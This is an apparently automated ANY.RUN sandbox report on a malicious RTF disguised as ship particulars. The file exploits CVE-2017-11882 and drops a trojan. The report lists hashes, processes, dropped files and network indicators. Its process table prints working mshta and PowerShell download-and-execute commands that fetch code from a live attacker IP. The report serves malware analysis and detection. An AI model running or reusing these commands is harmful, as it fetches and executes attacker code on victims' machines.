analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Vsl.80-Ship Particulars.doc

Full analysis: https://app.any.run/tasks/bbf5bbf9-7d38-48e7-a29d-02a20a2a1135
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: October 14, 2019, 05:09:29
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
generated-doc
exploit
CVE-2017-11882
trojan
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

FA68AF2C787551DAF613175E8E7768D4

SHA1:

2E887962E812864B0A16F4CA0A40B7769DA72357

SHA256:

404A3905CC9C5707E5F47859DCE2C2E16D19D369C92CD2AF1B020284E5DF0970

SSDEEP:

768:qxrBqbeW6HHkXzD7p2og7PPPPPhPPPPPgPPPPP6I1mzoR8oVojrc9YU:qqbx1UoWPcKU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 4084)
    • Application was dropped or rewritten from another process

      • pmtg.exe (PID: 2096)
      • pmtg.exe (PID: 856)
      • pmtg.exe (PID: 2080)
      • pmtg.exe (PID: 1596)
      • pmtg.exe (PID: 1884)
      • pmtg.exe (PID: 1400)
      • pmtg.exe (PID: 1516)
      • pmtg.exe (PID: 2828)
      • pmtg.exe (PID: 2952)
      • pmtg.exe (PID: 3316)
      • pmtg.exe (PID: 2172)
      • pmtg.exe (PID: 2728)
      • pmtg.exe (PID: 2448)
      • pmtg.exe (PID: 2332)
      • pmtg.exe (PID: 3856)
      • pmtg.exe (PID: 4032)
      • pmtg.exe (PID: 3824)
      • pmtg.exe (PID: 284)
      • pmtg.exe (PID: 3772)
      • pmtg.exe (PID: 3952)
      • pmtg.exe (PID: 2832)
      • pmtg.exe (PID: 3808)
      • pmtg.exe (PID: 4088)
      • pmtg.exe (PID: 1560)
      • pmtg.exe (PID: 1504)
      • pmtg.exe (PID: 2204)
      • pmtg.exe (PID: 3332)
      • pmtg.exe (PID: 1748)
      • pmtg.exe (PID: 940)
      • pmtg.exe (PID: 2380)
      • pmtg.exe (PID: 1524)
      • pmtg.exe (PID: 2484)
      • pmtg.exe (PID: 2232)
      • pmtg.exe (PID: 3084)
      • pmtg.exe (PID: 3276)
      • pmtg.exe (PID: 4020)
      • pmtg.exe (PID: 3948)
      • pmtg.exe (PID: 1636)
      • pmtg.exe (PID: 3024)
      • pmtg.exe (PID: 3820)
      • pmtg.exe (PID: 2520)
      • pmtg.exe (PID: 3272)
      • pmtg.exe (PID: 2260)
      • pmtg.exe (PID: 3616)
      • pmtg.exe (PID: 1932)
      • pmtg.exe (PID: 600)
      • pmtg.exe (PID: 1912)
      • pmtg.exe (PID: 2532)
      • pmtg.exe (PID: 2196)
      • pmtg.exe (PID: 2884)
      • pmtg.exe (PID: 1800)
      • pmtg.exe (PID: 3664)
      • pmtg.exe (PID: 3356)
      • pmtg.exe (PID: 3048)
      • pmtg.exe (PID: 2660)
      • pmtg.exe (PID: 1292)
      • pmtg.exe (PID: 3480)
      • pmtg.exe (PID: 3800)
      • pmtg.exe (PID: 3992)
      • pmtg.exe (PID: 3868)
      • pmtg.exe (PID: 1012)
      • pmtg.exe (PID: 1928)
      • pmtg.exe (PID: 836)
      • pmtg.exe (PID: 1416)
      • pmtg.exe (PID: 1016)
      • pmtg.exe (PID: 3180)
      • pmtg.exe (PID: 2928)
      • pmtg.exe (PID: 2760)
      • pmtg.exe (PID: 748)
      • pmtg.exe (PID: 3300)
      • pmtg.exe (PID: 3888)
      • pmtg.exe (PID: 2512)
      • pmtg.exe (PID: 932)
      • pmtg.exe (PID: 388)
      • pmtg.exe (PID: 4048)
      • pmtg.exe (PID: 1248)
      • pmtg.exe (PID: 3916)
      • pmtg.exe (PID: 1412)
      • pmtg.exe (PID: 2820)
      • pmtg.exe (PID: 1976)
      • pmtg.exe (PID: 3312)
      • pmtg.exe (PID: 2840)
      • pmtg.exe (PID: 2412)
      • pmtg.exe (PID: 3984)
      • pmtg.exe (PID: 1944)
      • pmtg.exe (PID: 4072)
      • pmtg.exe (PID: 1048)
      • pmtg.exe (PID: 3456)
      • pmtg.exe (PID: 3852)
      • pmtg.exe (PID: 3328)
      • pmtg.exe (PID: 3756)
      • pmtg.exe (PID: 1948)
      • pmtg.exe (PID: 2864)
      • pmtg.exe (PID: 2040)
      • pmtg.exe (PID: 640)
      • pmtg.exe (PID: 4036)
      • pmtg.exe (PID: 2684)
      • pmtg.exe (PID: 2744)
      • pmtg.exe (PID: 2644)
      • pmtg.exe (PID: 2184)
      • pmtg.exe (PID: 2088)
  • SUSPICIOUS

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EQNEDT32.EXE (PID: 4084)
    • Executed via COM

      • EQNEDT32.EXE (PID: 4084)
    • Executed via WMI

      • powershell.exe (PID: 3140)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3140)
    • Creates files in the user directory

      • powershell.exe (PID: 3140)
    • PowerShell script executed

      • powershell.exe (PID: 3140)
    • Application launched itself

      • pmtg.exe (PID: 2096)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1316)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1316)
    • Application was crashed

      • EQNEDT32.EXE (PID: 4084)
    • Reads internet explorer settings

      • MsHTa.exe (PID: 1764)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

InternalVersionNumber: 95
CharactersWithSpaces: -
Characters: -
Words: -
Pages: 1
TotalEditTime: -
RevisionNumber: 1
ModifyDate: 2019:10:07 21:04:00
CreateDate: 2019:10:07 21:04:00
LastModifiedBy: FireSecIT
Author: FireSecIT
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
143
Monitored processes
105
Malicious processes
3
Suspicious processes
69

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs eqnedt32.exe mshta.exe powershell.exe pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs pmtg.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1316"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Vsl.80-Ship Particulars.doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
4084"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
1764MsHTa http://103.207.38.8:1010/hta &AAAAAAAA CC:\Windows\system32\MsHTa.exe
EQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3140powershell -exec bypass -w 1 -c $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($V.downloadstring('http://103.207.38.8:1010/get'));C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2096"C:\Users\Public\pmtg.exe"C:\Users\Public\pmtg.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1596"C:\Users\Public\pmtg.exe"C:\Users\Public\pmtg.exepmtg.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
856"C:\Users\Public\pmtg.exe"C:\Users\Public\pmtg.exepmtg.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2080"C:\Users\Public\pmtg.exe"C:\Users\Public\pmtg.exepmtg.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1884"C:\Users\Public\pmtg.exe"C:\Users\Public\pmtg.exepmtg.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1400"C:\Users\Public\pmtg.exe"C:\Users\Public\pmtg.exepmtg.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Total events
2 003
Read events
1 200
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
3
Text files
1
Unknown types
3

Dropped files

PID
Process
Filename
Type
1316WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA8DD.tmp.cvr
MD5:
SHA256:
3140powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VIEBYJ5WOM3HLJKG0D5G.temp
MD5:
SHA256:
1316WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoBE89.tmp
MD5:
SHA256:
1316WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C39DCD18-3F71-4C41-BC7C-8C57C01A2BCE}.tmp
MD5:
SHA256:
1316WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{544A9123-4DF4-4245-9543-1A7FCEC2DF33}.tmp
MD5:
SHA256:
3140powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39b744.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
3140powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
1316WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{9DB4F1CE-CB9D-44FD-B8BB-BF4B5955C603}.tmpbinary
MD5:240AA41BE96B4A85841BDBE3A110A285
SHA256:45CA2A90464F3299EEC99D8343753BA988955C1BCDC6ADF9900A3E266C8809BE
1764MsHTa.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\hta[1]html
MD5:B4E61A6248989A55E62A6911A7CA5629
SHA256:BB1EE67DAB0FE73EE50E0B70ECF2A3FFEFBBDDE87717D84249D601E35F8A477B
1316WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$l.80-Ship Particulars.doc.rtfpgc
MD5:E985301B8111A01DA44F998D44EFA7FB
SHA256:EE44D4691B989349D0FA0D0492A2137149F327AFAE831D36791668F9A8A72D68
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1764
MsHTa.exe
GET
200
103.207.38.8:1010
http://103.207.38.8:1010/hta
VN
html
2.44 Kb
malicious
3140
powershell.exe
GET
200
103.207.38.8:1010
http://103.207.38.8:1010/get
VN
text
1.63 Mb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3140
powershell.exe
103.207.38.8:1010
VNPT Corp
VN
malicious
1764
MsHTa.exe
103.207.38.8:1010
VNPT Corp
VN
malicious

DNS requests

No data

Threats

PID
Process
Class
Message
1764
MsHTa.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
3140
powershell.exe
A Network Trojan was detected
ET TROJAN Windows executable base64 encoded
3140
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Script/Oneeva.A!ml
3140
powershell.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable base64 Payload
2 ETPRO signatures available at the full report
No debug info